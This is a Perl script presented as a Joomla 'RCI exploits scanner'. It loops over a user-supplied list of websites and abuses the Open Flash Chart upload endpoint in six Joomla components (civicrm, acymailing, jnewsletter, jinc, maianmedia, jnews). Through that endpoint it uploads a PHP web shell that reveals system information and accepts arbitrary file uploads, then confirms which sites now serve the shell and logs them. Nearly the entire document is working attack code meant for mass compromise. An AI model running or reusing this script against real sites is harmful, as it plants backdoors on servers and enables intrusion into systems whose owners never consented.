M-A Joomla RCI Exploits Scanner

1. #!/usr/bin/perl
2. # M-A_labz
3. # This tool will scan for RCI in :
4. # com_civicrm , com_acymailing , com_jnewsletter , com_jinc , com_maianmedia , com_jnews
5. # http://upload.traidnt.net/upfiles/LVc77789.png
6. # Author : b0y h4ck3r
7. use HTTP::Request;
8. use LWP::Simple;
9. use HTTP::Request::Common;
10. use Term::ANSIColor;
11. use Win32::Console::ANSI;
12. $ua = LWP::UserAgent->new;
13. print color("bold red"),"[+] M-A Joomla Components RCI Exploits Scanner \n";
14. print color 'reset';
15. print color("green"),"[+] Enter File : ";
16. print color 'reset';
17. $file=<STDIN>;
18. chomp($file);
19. open (file, "<$file") || die "[-] Can't open the List of site file !";
20. my @file = <file>;
21. close file;
22. foreach $webs (@file)
23. {
24. chomp $webs;
25. $site = $webs;
26. print color("green"), "[+] Scanning $site\n";
27. print color 'reset';
28. @paths=('/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php','/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php','/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php','/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php');
29. foreach $path(@paths)
30. {
31. $site_vul = "http://".$site."".$path."?name=tt7.php";
32. $data = "php code";
33. $data.= ' <title>Evil Upload</title> ';
34. $data.= ' <h1>Evil Upload</h1> ';
35. $data.= '<?php ';
36. $data.= "echo '<b><br><br>'.php_uname().'<br></b>'; ";
37. $data.= 'echo \'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">\'; ';
38. $data.= 'echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\'; ';
39. $data.= "if( \$_POST['_upl'] == \"Upload\" ) { ";
40. $data.= "if(\@copy(\$_FILES['file']['tmp_name'], \$_FILES['file']['name'])) { echo '<b>Upload Succesfully !!!</b><br><br>'; } ";
41. $data.= "else { echo '<b>Upload Fail !!!</b><br><br>'; } ";
42. $data.= " } ";
43. $data.= "?>";
44. $res = $ua->request(POST $site_vul,Content_Type => 'text/plain', Content => $data);
45. if ($res->is_success){
46. print color("green"), "[+] $site is vul\n";
47. print color 'reset';
48. @vulns=('/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/tt7.php','/administrator/components/com_acymailing/inc/openflash/tmp-upload-images/tt7.php','/administrator/components/com_jnewsletter/includes/openflashchart/tmp-upload-images/tt7.php','/administrator/components/com_jinc/classes/graphics/tmp-upload-images/tt7.php','/administrator/components/com_maianmedia/utilities/charts/tmp-upload-images/tt7.php','/administrator/components/com_jnews/includes/openflashchart/tmp-upload-images/tt7.php');
49. foreach $vul(@vulns)
50. {
51. $url = "http://".$site. $vul;
52. $request = HTTP::Request->new(GET=>$url);
53. $useragent = LWP::UserAgent->new();
54. $response = $useragent->request($request);
55. if ($response->content=~m/<title>Evil Upload<\/title>/g){
56. print color("green"), "[+] Found => $url\n\n";
57. print color 'reset';
58. open(BEN,">>result-$site.txt");
59. print BEN "$url\n";
60. close(BEN);
61. }else{
62. print "[-] Not Found \n";
63. }
64. }
65. }
66. }
67. }